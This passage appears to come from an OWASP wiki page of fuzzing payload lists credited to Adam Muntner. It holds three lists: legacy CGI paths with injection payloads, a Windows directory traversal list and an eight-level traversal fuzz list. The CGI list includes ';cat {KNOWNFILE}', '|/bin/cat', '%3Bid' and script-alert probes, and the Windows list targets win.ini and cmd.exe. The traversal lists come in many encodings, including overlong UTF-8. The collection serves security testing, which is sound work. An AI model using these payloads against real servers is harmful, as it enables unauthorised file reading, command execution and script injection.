sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
